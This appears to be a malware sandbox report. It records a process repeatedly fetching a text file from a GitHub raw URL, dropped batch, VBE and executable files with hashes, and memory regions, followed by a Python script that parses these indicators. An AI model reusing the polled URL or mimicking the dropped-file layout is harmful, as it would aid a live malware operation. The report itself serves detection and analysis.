                                                Source-Age: 67
                                              •
                                                GET
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                conhost.exe
                                                Remote address:
                                                185.199.109.133:443
                                                Request
                                                GET /justbio123/raven/main/api.txt HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                Host: raw.githubusercontent.com
                                                Connection: Keep-Alive
                                                Response
                                                HTTP/1.1 200 OK
                                                Connection: keep-alive
                                                Content-Length: 4
                                                Cache-Control: max-age=300
                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                Content-Type: text/plain; charset=utf-8
                                                ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                                Strict-Transport-Security: max-age=31536000
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: deny
                                                X-XSS-Protection: 1; mode=block
                                                X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
                                                Accept-Ranges: bytes
                                                Date: Sat, 21 Dec 2024 21:19:12 GMT
                                                Via: 1.1 varnish
                                                X-Served-By: cache-lcy-eglc8600086-LCY
                                                X-Cache: HIT
                                                X-Cache-Hits: 1
                                                X-Timer: S1734815953.513512,VS0,VE6
                                                Vary: Authorization,Accept-Encoding,Origin
                                                Access-Control-Allow-Origin: *
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Fastly-Request-ID: 5855cb549166e7e0f828ced81f9f25293ef1cd34
                                                Expires: Sat, 21 Dec 2024 21:24:12 GMT
                                                Source-Age: 76
                                              •
                                                DNS
                                                225.162.46.104.in-addr.arpa
                                                Remote address:
                                                8.8.8.8:53
                                                Request
                                                225.162.46.104.in-addr.arpa
                                                IN PTR
                                                Response
                                              • 185.199.109.133:443
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                tls, http
                                                conhost.exe
                                                897 B
                                                5.1kB
                                                8
                                                9

                                                HTTP Request

                                                GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                HTTP Response

                                                200
                                              • 185.199.109.133:443
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                tls, http
                                                conhost.exe
                                                861 B
                                                5.1kB
                                                8
                                                9

                                                HTTP Request

                                                GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                HTTP Response

                                                200
                                              • 185.199.109.133:443
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                tls, http
                                                conhost.exe
                                                914 B
                                                5.1kB
                                                8
                                                9

                                                HTTP Request

                                                GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                HTTP Response

                                                200
                                              • 185.199.109.133:443
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                tls, http
                                                conhost.exe
                                                914 B
                                                5.1kB
                                                8
                                                9

                                                HTTP Request

                                                GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                HTTP Response

                                                200
                                              • 185.199.109.133:443
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                tls, http
                                                conhost.exe
                                                897 B
                                                5.1kB
                                                8
                                                9

                                                HTTP Request

                                                GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                HTTP Response

                                                200
                                              • 185.199.109.133:443
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                tls, http
                                                conhost.exe
                                                861 B
                                                5.1kB
                                                8
                                                9

                                                HTTP Request

                                                GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                HTTP Response

                                                200
                                              • 185.199.109.133:443
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                tls, http
                                                conhost.exe
                                                897 B
                                                5.1kB
                                                8
                                                9

                                                HTTP Request

                                                GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                HTTP Response

                                                200
                                              • 185.199.109.133:443
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                tls, http
                                                conhost.exe
                                                914 B
                                                5.1kB
                                                8
                                                9

                                                HTTP Request

                                                GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                HTTP Response

                                                200
                                              • 185.199.109.133:443
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                tls, http
                                                conhost.exe
                                                897 B
                                                5.1kB
                                                8
                                                9

                                                HTTP Request

                                                GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                HTTP Response

                                                200
                                              • 185.199.109.133:443
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                tls, http
                                                conhost.exe
                                                861 B
                                                5.1kB
                                                8
                                                10

                                                HTTP Request

                                                GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                HTTP Response

                                                200
                                              • 185.199.109.133:443
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                tls, http
                                                conhost.exe
                                                914 B
                                                5.1kB
                                                8
                                                9

                                                HTTP Request

                                                GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                HTTP Response

                                                200
                                              • 185.199.109.133:443
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                tls, http
                                                conhost.exe
                                                914 B
                                                5.1kB
                                                8
                                                9

                                                HTTP Request

                                                GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                HTTP Response

                                                200
                                              • 8.8.8.8:53
                                                133.211.185.52.in-addr.arpa
                                                dns
                                                73 B
                                                147 B
                                                1
                                                1

                                                DNS Request

                                                133.211.185.52.in-addr.arpa

                                              • 8.8.8.8:53
                                                85.49.80.91.in-addr.arpa
                                                dns
                                                70 B
                                                145 B
                                                1
                                                1

                                                DNS Request

                                                85.49.80.91.in-addr.arpa

                                              • 8.8.8.8:53
                                                73.159.190.20.in-addr.arpa
                                                dns
                                                72 B
                                                158 B
                                                1
                                                1

                                                DNS Request

                                                73.159.190.20.in-addr.arpa

                                              • 8.8.8.8:53
                                                95.221.229.192.in-addr.arpa
                                                dns
                                                73 B
                                                144 B
                                                1
                                                1

                                                DNS Request

                                                95.221.229.192.in-addr.arpa

                                              • 8.8.8.8:53
                                                raw.githubusercontent.com
                                                dns
                                                conhost.exe
                                                71 B
                                                135 B
                                                1
                                                1

                                                DNS Request

                                                raw.githubusercontent.com

                                                DNS Response

                                                185.199.109.133
                                                185.199.111.133
                                                185.199.110.133
                                                185.199.108.133

                                              • 8.8.8.8:53
                                                133.109.199.185.in-addr.arpa
                                                dns
                                                74 B
                                                118 B
                                                1
                                                1

                                                DNS Request

                                                133.109.199.185.in-addr.arpa

                                              • 8.8.8.8:53
                                                50.23.12.20.in-addr.arpa
                                                dns
                                                70 B
                                                156 B
                                                1
                                                1

                                                DNS Request

                                                50.23.12.20.in-addr.arpa

                                              • 8.8.8.8:53
                                                13.86.106.20.in-addr.arpa
                                                dns
                                                71 B
                                                157 B
                                                1
                                                1

                                                DNS Request

                                                13.86.106.20.in-addr.arpa

                                              • 8.8.8.8:53
                                                15.164.165.52.in-addr.arpa
                                                dns
                                                72 B
                                                146 B
                                                1
                                                1

                                                DNS Request

                                                15.164.165.52.in-addr.arpa

                                              • 8.8.8.8:53
                                                92.12.20.2.in-addr.arpa
                                                dns
                                                69 B
                                                131 B
                                                1
                                                1

                                                DNS Request

                                                92.12.20.2.in-addr.arpa

                                              • 8.8.8.8:53
                                                23.236.111.52.in-addr.arpa
                                                dns
                                                72 B
                                                158 B
                                                1
                                                1

                                                DNS Request

                                                23.236.111.52.in-addr.arpa

                                              • 8.8.8.8:53
                                                225.162.46.104.in-addr.arpa
                                                dns
                                                73 B
                                                147 B
                                                1
                                                1

                                                DNS Request

                                                225.162.46.104.in-addr.arpa

                                              MITRE ATT&CK Enterprise v15

                                              Downloads

                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

                                                Filesize

                                                1KB

                                                MD5

                                                baf55b95da4a601229647f25dad12878

                                                SHA1

                                                abc16954ebfd213733c4493fc1910164d825cac8

                                                SHA256

                                                ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924

                                                SHA512

                                                24f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545

                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                Filesize

                                                2KB

                                                MD5

                                                d85ba6ff808d9e5444a4b369f5bc2730

                                                SHA1

                                                31aa9d96590fff6981b315e0b391b575e4c0804a

                                                SHA256

                                                84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                SHA512

                                                8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Filesize

                                                944B

                                                MD5

                                                d28a889fd956d5cb3accfbaf1143eb6f

                                                SHA1

                                                157ba54b365341f8ff06707d996b3635da8446f7

                                                SHA256

                                                21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

                                                SHA512

                                                0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Filesize

                                                944B

                                                MD5

                                                2e907f77659a6601fcc408274894da2e

                                                SHA1

                                                9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

                                                SHA256

                                                385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

                                                SHA512

                                                34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Filesize

                                                944B

                                                MD5

                                                e243a38635ff9a06c87c2a61a2200656

                                                SHA1

                                                ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc

                                                SHA256

                                                af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f

                                                SHA512

                                                4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Filesize

                                                944B

                                                MD5

                                                bd5940f08d0be56e65e5f2aaf47c538e

                                                SHA1

                                                d7e31b87866e5e383ab5499da64aba50f03e8443

                                                SHA256

                                                2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

                                                SHA512

                                                c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Filesize

                                                944B

                                                MD5

                                                3a6bad9528f8e23fb5c77fbd81fa28e8

                                                SHA1

                                                f127317c3bc6407f536c0f0600dcbcf1aabfba36

                                                SHA256

                                                986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05

                                                SHA512

                                                846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Filesize

                                                944B

  MD5       cadef9abd087803c630df65264a6c81c
  SHA1      babbf3636c347c8727c35f3eef2ee643dbcc4bd2
  SHA256    cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
  SHA512    7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize  944B
  MD5       a8e8360d573a4ff072dcc6f09d992c88
  SHA1      3446774433ceaf0b400073914facab11b98b6807
  SHA256    bf5e284e8f95122bf75ead61c7e2b40f55c96742b05330b5b1cb7915991df13b
  SHA512    4ee5167643d82082f57c42616007ef9be57f43f9731921bdf7bca611a914724ad94072d3c8f5b130fa54129e5328ccdebf37ba74339c37deb53e79df5cdf0dbe

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize  944B
  MD5       aaaac7c68d2b7997ed502c26fd9f65c2
  SHA1      7c5a3731300d672bf53c43e2f9e951c745f7fbdf
  SHA256    8724dc2c3c8e8f17aeefae44a23741b1ea3b43c490fbc52fd61575ffe1cd82bb
  SHA512    c526febd9430413b48bed976edd9a795793ad1f06c8ff4f6b768b4ad63f4d2f06b9da72d4fcfa7cb9530a64e2dc3554f5ad97fd0ab60129701d175f2724ef1ac

• C:\Users\Admin\AppData\Local\Temp\J6RTVEKunr.bat
  Filesize  198B
  MD5       b8d4e2e1f447722ca26683c8113891ab
  SHA1      6063919402158e6f09f2f5031f4c22748bd55b32
  SHA256    193e6dae55793a6b4e2375a0608dfb33181b1924d385df51deaf13e5e01b4763
  SHA512    5446fe649e2537fa58cf920a1004ce53465ad81a6dde7bde484a81c57f3644732f440e9cb81ed4b3859bac890d807461a16cda4bb496458eb4d6fce569836c9c

• C:\Users\Admin\AppData\Local\Temp\N4rS0hE0df.bat
  Filesize  198B
  MD5       398157ecc41f37e30af5665bd6a945ad
  SHA1      fb85f3d77ecfacf87b414586cc3f6164a0bfe393
  SHA256    47f5c584bd06a6d1d86b0865675e28aa321acedcdc97a01db8a8b485ae02f90a
  SHA512    d59b7c0dfa0952f55bbc2e47b38a266cbef17b30b6b766b240cec080470fb985c021aba25fdad0ee3677780e7595afb27b19594b649fbf41cfae8ca3c377bac8

• C:\Users\Admin\AppData\Local\Temp\SvvYNrLnHE.bat
  Filesize  198B
  MD5       ed54c357bd3ee791935b238372c423f9
  SHA1      8c0cd7cc85d93e623c049dab2842386f8176a5b9
  SHA256    9ca7617c8158c41a85991b08efd3a4a57419326d75673dbc6e945e646647864d
  SHA512    ac93ed6cfc29f2f3421171985ae8791f8da69f274a02aee5d72aaed436829470070e3f25fa326f32f4b1d2a6ecff2d513166cea5b80d127675bfb90685d88002

• C:\Users\Admin\AppData\Local\Temp\Ww6iFNwlpp.bat
  Filesize  198B
  MD5       bf5b158dfca2117c589b15012d668534
  SHA1      e780e2e885440dce3e2fd30a25d03d249567b665
  SHA256    dcf526fc2f082cb2543977566ce36277de5e440952574bd77c9ce48626045635
  SHA512    4cf6fe3eedd3aaa91a8fcd39952b50ced7011f4adc5b942052a792cbd2bebb790aacfd89806a6f732c4b6214a3348a7e14d217095420b9e80f3490aa5aceb4fa

• C:\Users\Admin\AppData\Local\Temp\Xnyek1SZun.bat
  Filesize  198B
  MD5       c3e9ea2a6a20c09d240f384ada1a034e
  SHA1      45dad97758ff6e7eed327fca5b87b85a1052b58d
  SHA256    188431cd28bdf6bd61f206875ae405ac29b588ab76c219c3cbb34525d4ba6867
  SHA512    2a5cc2f919309139ae56e3fc826b69e70ae6861cc7581a8df3706fd6c376e49701477bbed7a97438c5a02fa1dda05767de9409475b4f27941d4743fd5ffa1bb2

• C:\Users\Admin\AppData\Local\Temp\Ys8lvSze9b.bat
  Filesize  198B
  MD5       a5ed04848e27ce992974af6976ac5c71
  SHA1      596f4859533e61645d74fd26026c507db21f1251
  SHA256    2a2d459164d8da0e8e7fdc91f13e75a2330becbe8de96a204b168cd86f2cee19
  SHA512    4fb55e616212bdc8c8d3cc09e7280893e5e77013d2e52702e0d39d7f3029aa7662d336ca92c3a1680e49befb53f7b9a01fcc0025ed6b435730d4973afdb97f4b

• C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ysdtarew.lm1.ps1
  Filesize  60B
  MD5       d17fe0a3f47be24a6453e9ef58c94641
  SHA1      6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

• C:\Users\Admin\AppData\Local\Temp\bf2k7CZMYL.bat
  Filesize  198B
  MD5       f78ff9cd31a189bb8f21426072880dc5
  SHA1      cd5f2b714e7004fbb05b58f637f259ea6f899616
  SHA256    512b3ad6a2ae85aa67931654fd27c1b7c1cf25431a625b9b460bbc9c1cd129fb
  SHA512    4098ab247cc180e58fdbcd198f593c4357528e7749d20fa9f603ad718ce8cb00a02c1888e2df518b8150fa283df6c599bfcbf43c53e842700576479991b83a95

• C:\Users\Admin\AppData\Local\Temp\iYTmIkWLiw.bat
  Filesize  198B
  MD5       a15c6b71d7d2b3c59c1b21cc17833936
  SHA1      7a2fde2cee379bf2cd4893be371f2b3dd4c30322
  SHA256    bb2b76623e0ea6a57e3aa074e38fd81fb8d1c38cce9efc0db1e087355379eb3d
  SHA512    da60f820a3ea16eb01d225e6f3fabae052ee26d5d103d0301f08a07d4aa135f95313498880cfe8b1ea6c23fa6cbf4a5e395407555b5a1faafced70f4b68c5c0d

• C:\Users\Admin\AppData\Local\Temp\lZfwAG7KGX.bat
  Filesize  198B
  MD5       a0581c2414a59c107865ff4cdc46f07b
  SHA1      e1a35c054a20be0dcc3317b0304ce3e676aae3f1
  SHA256    ff3d53ff1641b812ccce594bdd70ced0f91b393dc9f1799eff77061b61b2f7ab
  SHA512    c9a9ab39063a431e5c34461f4c3c3ff50a8842f4a89a1e211b69e087db772ee783ddc1044c6a86e9a5bb3ca5dc2dd64950ce83369a7d623280f72981363d6cd4

• C:\Users\Admin\AppData\Local\Temp\mQXsfud8LV.bat
  Filesize  198B
  MD5       f738e6d2808d82f6e1dc392a7c9895af
  SHA1      fe03b8a8692612d3643e65f8cae300ff27d50fc4
  SHA256    d6475bd5f9a67eeb4eb390c37b64161b74f6cc655428d6b8888aa4fbf95329aa
  SHA512    2227bbe14079e8cebcb523141ed411789df2d394cbd684ae821ecdfe9110f805c9d563b55080772d1b4322e5dfdc35ef5e49cc57f841c9c56770c8379a56d2ce

• C:\providercommon\1zu9dW.bat
  Filesize  36B
  MD5       6783c3ee07c7d151ceac57f1f9c8bed7
  SHA1      17468f98f95bf504cc1f83c49e49a78526b3ea03
  SHA256    8ab782f0f327a2021530e7230d3aee8abbecb7eed59482a3a46e78b9e3862322
  SHA512    c6012d4bfac1ed14d0fd9f0eabd0e1c3d647b343db292a907b246271d52a4b7469c809db43910ddba2e8c5045f9cb3d24d0af62d363281e6cb8b39ee94a183e8

• C:\providercommon\DllCommonsvc.exe
  Filesize  1.0MB
  MD5       bd31e94b4143c4ce49c17d3af46bcad0
  SHA1      f8c51ff3ff909531d9469d4ba1bbabae101853ff
  SHA256    b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63
  SHA512    f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

• C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe
  Filesize  197B
  MD5       8088241160261560a02c84025d107592
  SHA1      083121f7027557570994c9fc211df61730455bb5
  SHA256    2072cc9a4a3b84d4c5178ab41c5588eea7d0103e3928e34d64f17bf97f3d1cc1
  SHA512    20d9369dd359315848ea30144383a0bb479d86059fdbc3b3256ac84f998193512feb3b1799ab663619920c99fe7e0ebba33ada31a3855094b956fcd351c90478

• memory/1440-15-0x000000001AEE0000-0x000000001AEEC000-memory.dmp
  Filesize  48KB

• memory/1440-16-0x0000000002600000-0x000000000260C000-memory.dmp
  Filesize  48KB

• memory/1440-14-0x00000000025F0000-0x0000000002602000-memory.dmp
  Filesize  72KB

• memory/1440-13-0x00000000001B0000-0x00000000002C0000-memory.dmp
  Filesize  1.1MB

• memory/1440-17-0x000000001AEF0000-0x000000001AEFC000-memory.dmp
  Filesize  48KB

• memory/1440-12-0x00007FFAC1EA3000-0x00007FFAC1EA5000-memory.dmp
  Filesize  8KB

• memory/1900-82-0x000002799EF40000-0x000002799EF62000-memory.dmp
  Filesize  136KB

• memory/4828-342-0x0000000002B90000-0x0000000002BA2000-memory.dmp
  Filesize  72KB

• memory/4896-239-0x000000001B540000-0x000000001B552000-memory.dmp
  Filesize  72KB

• memory/5360-298-0x0000000002A60000-0x0000000002A72000-memory.dmp
  Filesize  72KB

• memory/5740-329-0x0000000001010000-0x0000000001022000-memory.dmp
  Filesize  72KB
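The dropped-file and memory-dump listing above is only useful once it is machine-readable. The following Python is an added example, not Triage's own code or an official parser of its report format: it turns the flattened "label line, value line" layout into records, checks that each memory dump's address range agrees with the size the sandbox reports (e.g. 0x1B0000 to 0x2C0000 is 0x110000 bytes, which rounds to the listed 1.1MB), and looks a file's digests up against the report's hashes. The sample text embedded below is constructed from three entries copied from this page; keying the lookup on SHA256 and the 10% rounding tolerance are the example's own choices. Only the standard library is used.

```python
# Added example (not Triage's own code): parse this page's dropped-file and
# memory-dump listing into IOC records. SAMPLE_LISTING is constructed from
# entries copied from the page, in its flattened "label line, value line" layout.
import hashlib
import re
from dataclasses import dataclass

SAMPLE_LISTING = r"""
• C:\Users\Admin\AppData\Local\Temp\J6RTVEKunr.bat
  Filesize
  198B
  MD5
  b8d4e2e1f447722ca26683c8113891ab
  SHA1
  6063919402158e6f09f2f5031f4c22748bd55b32
  SHA256
  193e6dae55793a6b4e2375a0608dfb33181b1924d385df51deaf13e5e01b4763
  SHA512
  5446fe649e2537fa58cf920a1004ce53465ad81a6dde7bde484a81c57f3644732f440e9cb81ed4b3859bac890d807461a16cda4bb496458eb4d6fce569836c9c
• memory/1440-13-0x00000000001B0000-0x00000000002C0000-memory.dmp
  Filesize
  1.1MB
• memory/1900-82-0x000002799EF40000-0x000002799EF62000-memory.dmp
  Filesize
  136KB
"""

ALGS = ("MD5", "SHA1", "SHA256", "SHA512")
LABELS = {"Filesize", *ALGS}
MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
UNITS = {"B": 1, "KB": 1024, "MB": 1024 ** 2, "GB": 1024 ** 3}

@dataclass
class DroppedFile:
    path: str
    size: str      # as reported, e.g. "198B" or "1.0MB"
    hashes: dict   # algorithm name -> lowercase hex digest

@dataclass
class MemoryRegion:
    pid: int
    index: int
    base: int
    end: int
    size: str      # as reported, rounded by the sandbox

def _split_entries(text):
    entries, label = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("•"):
            entries.append({"path": line[1:].strip()})
            label = None
        elif not entries:
            continue                     # stray text before the first bullet
        elif label is None:
            if line not in LABELS:
                raise ValueError(f"unexpected label {line!r}")
            label = line                 # value follows on the next non-blank line
        else:
            entries[-1][label] = line
            label = None
    return entries

def parse_listing(text):
    """Split the listing into (dropped files, memory regions)."""
    files, regions = [], []
    for e in _split_entries(text):
        m = MEM_RE.match(e["path"])
        if m:
            pid, idx, base, end = m.groups()
            regions.append(MemoryRegion(int(pid), int(idx), int(base, 16), int(end, 16), e.get("Filesize", "")))
        else:
            files.append(DroppedFile(e["path"], e.get("Filesize", ""), {a: e[a].lower() for a in ALGS if a in e}))
    return files, regions

def size_to_bytes(text):
    m = re.fullmatch(r"([\d.]+)\s*([KMG]?B)", text.strip())
    if not m:
        raise ValueError(f"unparseable size {text!r}")
    return float(m.group(1)) * UNITS[m.group(2)]

def region_size_consistent(region, tolerance=0.1):
    """True if end - base agrees with the reported (rounded) size within `tolerance`."""
    expected = size_to_bytes(region.size)
    return abs((region.end - region.base) - expected) <= tolerance * expected

def hash_stream(chunks):
    """All four digests in one pass; pass iter(lambda: fh.read(1 << 20), b"") for a file."""
    digests = {a: hashlib.new(a.lower()) for a in ALGS}
    for block in chunks:
        for d in digests.values():
            d.update(block)
    return {a: d.hexdigest() for a, d in digests.items()}

def lookup(digests, files):
    """The DroppedFile whose SHA256 matches the given digests, else None."""
    wanted = digests["SHA256"].lower()
    return next((f for f in files if f.hashes.get("SHA256") == wanted), None)
```

To check a file recovered from a host or a sandbox export, open it in binary mode, feed `hash_stream` the chunk iterator shown in its docstring, and pass the result to `lookup` together with the parsed `files`; a `None` result means the SHA256 is not in the report. The size consistency check is worth running over every memory entry because the range in the dump's name and the rounded "Filesize" come from different fields, and a mismatch usually signals a copy or parsing error in the IOC list rather than anything about the sample.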
